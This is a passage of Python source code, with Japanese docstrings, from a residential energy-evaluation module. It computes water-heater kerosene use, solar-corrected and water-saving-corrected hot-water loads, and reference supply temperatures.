elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return whybrid.calc_E_G_hs_d_t(
L_HWH=L_HWH,
hybrid_category=hybrid_category,
Theta_ex_Ave=Theta_ex_Ave,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == 'コージェネレーションを使用する':
return np.zeros(365)
else:
raise ValueError(hw_type)
def calc_E_K_hs_d_t(hw_type, e_rtd, e_dash_rtd, bath_function, theta_ex_d_Ave_d, L_dashdash_k_d_t, L_dashdash_s_d_t,
L_dashdash_w_d_t,
L_dashdash_b1_d_t, L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t):
"""1時間当たりの給湯機の灯油消費量 (MJ/h)
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
e_rtd(float): 当該給湯機の効率
e_dash_rtd(float): 「エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の判断の基準等」(ガス温水機器)に定義される「エネルギー消費効率」
bath_function(str): ふろ機能の種類
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機の灯油消費量 (MJ/h)
"""
if hw_type == 'ガス従来型給湯機' or hw_type == 'ガス従来型給湯温水暖房機' \
or hw_type == 'ガス潜熱回収型給湯機' or hw_type == 'ガス潜熱回収型給湯温水暖房機':
return gas.get_E_K_hs_d_t()
elif hw_type == '石油従来型給湯機' or hw_type == '石油従来型給湯温水暖房機' \
or hw_type == '石油潜熱回収型給湯機' or hw_type == '石油潜熱回収型給湯温水暖房機':
return oil.calc_E_K_hs_d_t(
hw_type=hw_type,
bath_function=bath_function,
e_rtd=e_rtd,
e_dash_rtd=e_dash_rtd,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '電気ヒートポンプ給湯機':
return eheatpump.get_E_K_hs_d_t()
elif hw_type == '電気ヒーター給湯機' or hw_type == '電気ヒーター給湯温水暖房機':
return eheater.get_E_K_hs()
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(仕様による)':
return gas_hybrid.get_E_K_hs()
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(試験された値を用いる)':
return hybrid_gas.get_E_K_hs_d_t()
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return hybrid_gas.get_E_K_hs_d_t()
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return whybrid.get_E_K_hs_d_t()
elif hw_type == 'コージェネレーションを使用する':
return np.zeros(365)
else:
raise ValueError(hw_type)
def get_normalized_bath_function(hw_type, bath_function):
"""表4 評価可能な給湯機/給湯温水暖房機の種類
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
bath_function(str): ふろ機能の種類
Returns:
str: 評価可能な給湯機/給湯温水暖房機の種類
"""
if hw_type == 'ガス従来型給湯機' or hw_type == 'ガス従来型給湯温水暖房機' \
or hw_type == 'ガス潜熱回収型給湯機' or hw_type == 'ガス潜熱回収型給湯温水暖房機':
return bath_function
elif hw_type == '石油従来型給湯機' or hw_type == '石油従来型給湯温水暖房機' \
or hw_type == '石油潜熱回収型給湯機' or hw_type == '石油潜熱回収型給湯温水暖房機':
return bath_function
elif hw_type == '電気ヒートポンプ給湯機':
return bath_function
elif hw_type == '電気ヒーター給湯機' or hw_type == '電気ヒーター給湯温水暖房機':
return bath_function
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' \
or hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(試験された値を用いる)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(仕様による)':
return "ふろ給湯機(追焚あり)"
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return "ふろ給湯機(追焚あり)"
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return "ふろ給湯機(追焚あり)"
elif hw_type == 'コージェネレーションを使用する':
return bath_function
else:
raise ValueError(hw_type)
# ============================================================================
# 7. 太陽熱補正給湯熱負荷
# ============================================================================
def calc_L_dashdash_k_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h) (4a)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
"""
L_dashdash_k_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_k_d_t[f] = L_dash_k_d_t[f] - L_sun_d_t[f] * (L_dash_k_d_t[f] / L_dash_d_t[f])
return L_dashdash_k_d_t
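# Note (supplementary, illustrative): equation (4a) splits the solar contribution
# L_sun_d_t across the individual uses in proportion to their share of the total
# tap load. For example, if L'_k = 2 MJ/h, the total L' = 8 MJ/h and
# L_sun = 4 MJ/h, the corrected kitchen load is 2 - 4 * (2 / 8) = 1 MJ/h.
# Hours with zero total load are left at 0 by the boolean mask `f`.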
def calc_L_dashdash_s_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h) (4b)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
"""
L_dashdash_s_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_s_d_t[f] = L_dash_s_d_t[f] - L_sun_d_t[f] * (L_dash_s_d_t[f] / L_dash_d_t[f])
return L_dashdash_s_d_t
def calc_L_dashdash_w_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h) (4c)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
"""
L_dashdash_w_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_w_d_t[f] = L_dash_w_d_t[f] - L_sun_d_t[f] * (L_dash_w_d_t[f] / L_dash_d_t[f])
return L_dashdash_w_d_t
def calc_L_dashdash_b1_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h) (4d)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
"""
L_dashdash_b1_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_b1_d_t[f] = L_dash_b1_d_t[f] - L_sun_d_t[f] * (L_dash_b1_d_t[f] / L_dash_d_t[f])
return L_dashdash_b1_d_t
def calc_L_dashdash_b2_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/h) (4e)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/h)
"""
L_dashdash_b2_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_b2_d_t[f] = L_dash_b2_d_t[f] - L_sun_d_t[f] * (L_dash_b2_d_t[f] / L_dash_d_t[f])
return L_dashdash_b2_d_t
def calc_L_dashdash_ba1_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/h) (4f)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/h)
"""
L_dashdash_ba1_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_ba1_d_t[f] = L_dash_ba1_d_t[f] - L_sun_d_t[f] * (L_dash_ba1_d_t[f] / L_dash_d_t[f])
return L_dashdash_ba1_d_t
def get_L_dashdash_ba2_d_t(L_dash_ba2_d_t):
"""1時間当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/h) (4g)
Args:
L_dash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/h)
"""
return L_dash_ba2_d_t
def calc_L_sun_d_t(region, sol_region=None, solar_device=None, ls_type=None, A_sp=None, P_alpha_sp=None, P_beta_sp=None,
W_tnk_ss=None, hotwater_use=None, heating_flag_d=None, A_col=None, P_alpha=None, P_beta=None,
V_fan_P0=None, d0=None,
d1=None, m_fan_test=None, W_tnk_ass=None, Theta_wtr_d=None, L_dash_k_d_t=None, L_dash_s_d_t=None,
L_dash_w_d_t=None, L_dash_b1_d_t=None, L_dash_b2_d_t=None, L_dash_ba1_d_t=None):
"""太陽熱利用給湯設備による補正集熱量
Args:
region(int): 省エネルギー地域区分
sol_region(int, optional): 年間の日射地域区分 (Default value = None)
solar_device(str, optional): 太陽熱利用設備の種類 (液体集熱式,空気集熱式,None) (Default value = None)
ls_type(str, optional): 液体集熱式太陽熱利用設備の種類 (太陽熱温水器,ソーラーシステム) (Default value = None)
A_sp(float, optional): 太陽熱集熱部の有効集熱面積 (m2) (Default value = None)
P_alpha_sp(float, optional): 太陽熱集熱部の方位角 (°) (Default value = None)
P_beta_sp(float, optional): 太陽熱集熱部の傾斜角 (°) (Default value = None)
W_tnk_ss(float, optional): ソーラーシステムのタンク容量 (L) (Default value = None)
W_tnk_ass(float, optional): タンク容量 (L) (Default value = None)
Theta_wtr_d(ndarray, optional): 日平均給水温度 (℃) (Default value = None)
L_dash_k_d_t(ndarray, optional): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h) (Default value = None)
L_dash_s_d_t(ndarray, optional): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h) (Default value = None)
L_dash_w_d_t(ndarray, optional): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h) (Default value = None)
L_dash_b1_d_t(ndarray, optional): 1時間当たりの浴槽水栓湯はりにおける節湯補正給湯熱負荷 (MJ/h) (Default value = None)
L_dash_b2_d_t(ndarray, optional): 1時間当たりの浴槽自動湯はりにおける節湯補正給湯熱負荷 (MJ/h) (Default value = None)
L_dash_ba1_d_t(ndarray, optional): 1時間当たりの浴槽水栓さし湯における節湯補正給湯熱負荷 (MJ/h) (Default value = None)
hotwater_use: Default value = None)
heating_flag_d: Default value = None)
A_col: Default value = None)
P_alpha: Default value = None)
P_beta: Default value = None)
V_fan_P0: Default value = None)
d0: Default value = None)
d1: Default value = None)
m_fan_test: Default value = None)
Returns:
ndarray: 1時間当たりの太陽熱利用設備による補正集熱量 (MJ/h)
"""
if solar_device == '液体集熱式':
return lss.calc_L_sun_lss_d_t(
region=region,
sol_region=sol_region,
ls_type=ls_type,
A_sp=A_sp,
P_alpha_sp=P_alpha_sp,
P_beta_sp=P_beta_sp,
W_tnk_ss=W_tnk_ss,
Theta_wtr_d=Theta_wtr_d,
L_dash_k_d_t=L_dash_k_d_t,
L_dash_s_d_t=L_dash_s_d_t,
L_dash_w_d_t=L_dash_w_d_t,
L_dash_b1_d_t=L_dash_b1_d_t,
L_dash_b2_d_t=L_dash_b2_d_t,
L_dash_ba1_d_t=L_dash_ba1_d_t
)
elif solar_device == '空気集熱式':
if hotwater_use == True:
outdoor = load_outdoor()
Theta_ex_d_t = get_Theta_ex(region, outdoor)
Theta_col_nonopg_d_t, Theta_col_opg_d_t = ass.calc_Theta_col(A_col, P_alpha, P_beta, V_fan_P0, d0, d1,
m_fan_test, region, sol_region, Theta_ex_d_t)
t_fan_d_t = ass.get_t_fan_d_t(Theta_col_nonopg_d_t, Theta_col_opg_d_t)
t_cp_d_t = ass.get_t_cp_d_t(hotwater_use, t_fan_d_t, heating_flag_d)
V_fan_d_t = ass.get_V_fan_d_t(t_fan_d_t, V_fan_P0)
Q_col_d_t = ass.get_Q_col_d_t(V_fan_d_t, Theta_col_opg_d_t, Theta_ex_d_t)
Q_d = ass.calc_Q_d(Q_col_d_t, t_cp_d_t)
L_tnk_d = ass.calc_L_tnk_d(Q_d, W_tnk_ass, Theta_wtr_d)
return ass.calc_L_sun_ass_d_t(L_tnk_d, L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t,
L_dash_b2_d_t, L_dash_ba1_d_t)
else:
return np.zeros(24 * 365)
elif solar_device is None:
return np.zeros(24 * 365)
else:
raise ValueError(solar_device)
# ============================================================================
# 8. 節湯補正給湯熱負荷
# ============================================================================
def get_L_dash_k_d_t(W_dash_k_d_t, Theta_sw_k, Theta_wtr_d):
"""台所水栓における節湯補正給湯負荷 (MJ/h) (5a)
Args:
W_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
Theta_sw_k(int): 台所水栓における基準給湯温度 (℃)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 台所水栓における節湯補正給湯負荷 (MJ/h)
"""
return W_dash_k_d_t * (Theta_sw_k - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3)
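# Note (supplementary, illustrative): the load is hot-water volume times the
# temperature lift, converted with the specific heat of water
# (4.186 kJ/(L*K) = 4.186 * 10**-3 MJ/(L*K)). For example, 10 L/h supplied at
# 40 degC with 10 degC feed water gives 10 * (40 - 10) * 4.186e-3, i.e. about 1.26 MJ/h.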
def get_L_dash_s_d_t(W_dash_s_d_t, Theta_sw_s, Theta_wtr_d):
"""浴室シャワー水栓における節湯補正給湯負荷 (5b)
Args:
W_dash_s_d_t(ndarray): 1時間当たりの浴室シャワーにおける節湯補正給湯量 (L/h)
Theta_sw_s(int): 浴室シャワー水栓における基準給湯温度 (℃)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 浴室シャワーにおける節湯補正給湯負荷 (MJ/h)
"""
return W_dash_s_d_t * (Theta_sw_s - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3)
def get_L_dash_w_d_t(W_dash_w_d_t, Theta_sw_w, Theta_wtr_d):
"""洗面水栓における節湯補正給湯負荷 (5c)
Args:
W_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯量 (L/h)
Theta_sw_w(int): 洗面水栓における基準給湯温度 (℃)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 洗面水栓における節湯補正給湯負荷 (MJ/h)
"""
return W_dash_w_d_t * (Theta_sw_w - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3)
def get_L_dash_bx_d_t(W_dash_b1_d_t, W_dash_b2_d_t, Theta_wtr_d, has_bath, bash_function):
"""浴槽水栓湯はり時における節水補正給湯熱負荷 L_dash_b1_d, L_dash_b2_d
Args:
W_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽自動湯はり時における節湯補正給湯量 (L/h)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
has_bath(bool): 浴室等の有無
bash_function(str): ふろ機能の種類
Returns:
tuple: 浴槽水栓湯はり時・浴槽自動湯はり時における節湯補正給湯熱負荷 (MJ/h)
"""
if has_bath == False:
L_dash_b1_d_t = np.zeros(24 * 365) # (5-1d)
L_dash_b2_d_t = np.zeros(24 * 365) # (5-1e)
return L_dash_b1_d_t, L_dash_b2_d_t
elif bash_function == '給湯単機能':
Theta_sw_b1 = get_Theta_sw_b1()
L_dash_b1_d_t = W_dash_b1_d_t * (Theta_sw_b1 - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3) # (5-2d)
L_dash_b2_d_t = np.zeros(24 * 365) # (5-2e)
return L_dash_b1_d_t, L_dash_b2_d_t
elif bash_function == 'ふろ給湯機(追焚あり)' or bash_function == 'ふろ給湯機(追焚なし)':
Theta_sw_b2 = get_Theta_sw_b2()
L_dash_b1_d_t = np.zeros(24 * 365) # (5-3d)
L_dash_b2_d_t = W_dash_b2_d_t * (Theta_sw_b2 - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3) # (5-3e)
return L_dash_b1_d_t, L_dash_b2_d_t
else:
raise ValueError(bash_function)
def get_L_dash_bax_d_t(W_dash_ba1_d_t, Theta_wtr_d, L_ba_d_t, has_bath, bash_function):
"""浴槽水栓さし湯時における節水補正給湯熱負荷 L_dash_ba1_d, L_dash_ba2_d
Args:
W_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
L_ba_d_t(ndarray): 1時間当たりの浴槽沸かし直しによる給湯熱負荷 (MJ/h)
has_bath(bool): 浴室等の有無
bash_function(str): ふろ機能の種類 (給湯単機能,ふろ給湯機(追焚なし),ふろ給湯機(追焚あり))
Returns:
tuple: 浴槽水栓さし湯時・浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
"""
if has_bath == False:
L_dash_ba1_d_t = np.zeros(24 * 365) # (5-1f)
L_dash_ba2_d_t = np.zeros(24 * 365) # (5-1g)
return L_dash_ba1_d_t, L_dash_ba2_d_t
elif bash_function == '給湯単機能' or bash_function == 'ふろ給湯機(追焚なし)':
Theta_sw_ba1 = get_Theta_sw_ba1()
L_dash_ba1_d_t = W_dash_ba1_d_t * (Theta_sw_ba1 - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3) # (5-2f)
L_dash_ba2_d_t = np.zeros(24 * 365) # (5-2g)
return L_dash_ba1_d_t, L_dash_ba2_d_t
elif bash_function == 'ふろ給湯機(追焚あり)':
L_dash_ba1_d_t = np.zeros(24 * 365) # (5-3f)
L_dash_ba2_d_t = L_ba_d_t * 1.25 # (5-3g)
return L_dash_ba1_d_t, L_dash_ba2_d_t
else:
raise ValueError(bash_function)
def get_Theta_sw_k():
"""台所水栓の基準給湯温度
Args:
Returns:
int: 台所水栓の基準給湯温度
"""
return get_table_5()[0]
def get_Theta_sw_s():
"""浴室シャワー水栓の基準給湯温度
Args:
Returns:
int: 浴室シャワー水栓の基準給湯温度
"""
return get_table_5()[1]
def get_Theta_sw_w():
"""洗面水栓の基準給湯温度
Args:
Returns:
int: 洗面水栓の基準給湯温度
"""
return get_table_5()[2]
def get_Theta_sw_b1():
"""浴槽水栓湯はりの基準給湯温度
Args:
Returns:
int: 浴槽水栓湯はりの基準給湯温度
"""
return get_table_5()[3]
def get_Theta_sw_b2():
"""浴槽自動湯はりの基準給湯温度
Args:
Returns:
int: 浴槽自動湯はりの基準給湯温度
"""
return get_table_5()[4]
def get_Theta_sw_ba1():
"""浴槽水栓さし湯の基準給湯温度
Args:
Returns:
int: 浴槽水栓さし湯の基準給湯温度
"""
return get_table_5()[5]
def get_table_5():
"""表 5 用途ごとの基準給湯温度
Args:
Returns:
list: 用途ごとの基準給湯温度
"""
table_5 = [
40,
40,
40,
40,
40,
60
]
return table_5
# ============================================================================
# 9. 節湯補正給湯量
# ============================================================================
def calc_W_dash_k_d_t(W_k_d_t, kitchen_watersaving_A, kitchen_watersaving_C, pipe_diameter, Theta_wtr_d):
"""1時間当たりの台所水栓における節湯補正給湯量 [L/h] (6a)
Args:
W_k_d_t(ndarray): 1時間当たりの台所水栓における基準給湯量 (L/h)
kitchen_watersaving_A(bool): 台所水栓の手元止水機能の有無
kitchen_watersaving_C(bool): 台所水栓の水優先吐水機能の有無
pipe_diameter(str): ヘッダー分岐後の径
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
"""
# 台所水栓における節湯の効果係数
f_sk = watersaving.get_f_sk(kitchen_watersaving_A, kitchen_watersaving_C, Theta_wtr_d)
# 配管における節湯の効果係数
f_sp = watersaving.get_f_sp(pipe_diameter)
return W_k_d_t * np.repeat(f_sk, 24) * f_sp
def calc_W_dash_s_d_t(W_s_d_t, shower_watersaving_A, shower_watersaving_B, pipe_diameter):
"""1時間当たりの浴室シャワーにおける節湯補正給湯量 (L/h) (6a)
Args:
W_s_d_t(ndarray): 浴室シャワーにおける基準給湯量 (L/h)
shower_watersaving_A(bool): 浴室シャワー水栓の手元止水機能の有無
shower_watersaving_B(bool): 浴室シャワー水栓の小流量吐水機能の有無
pipe_diameter(str): ヘッダー分岐後の径
Returns:
ndarray: 1時間当たりの浴室シャワーにおける節湯補正給湯量 (L/h)
"""
# 浴室シャワー水栓における節湯の効果係数
f_ss = watersaving.get_f_ss(shower_watersaving_A, shower_watersaving_B)
# 配管における節湯の効果係数
f_sp = watersaving.get_f_sp(pipe_diameter)
return W_s_d_t * f_ss * f_sp
def calc_W_dash_w_d_t(W_w_d_t, washbowl_watersaving_C, pipe_diameter, Theta_wtr_d):
"""1時間当たりの台所水栓における節湯補正給湯量 (L/h) (6c)
Args:
W_w_d_t(ndarray): 台所水栓における基準給湯量 (L/h)
washbowl_watersaving_C(bool): 洗面水栓の水優先吐水機能の有無
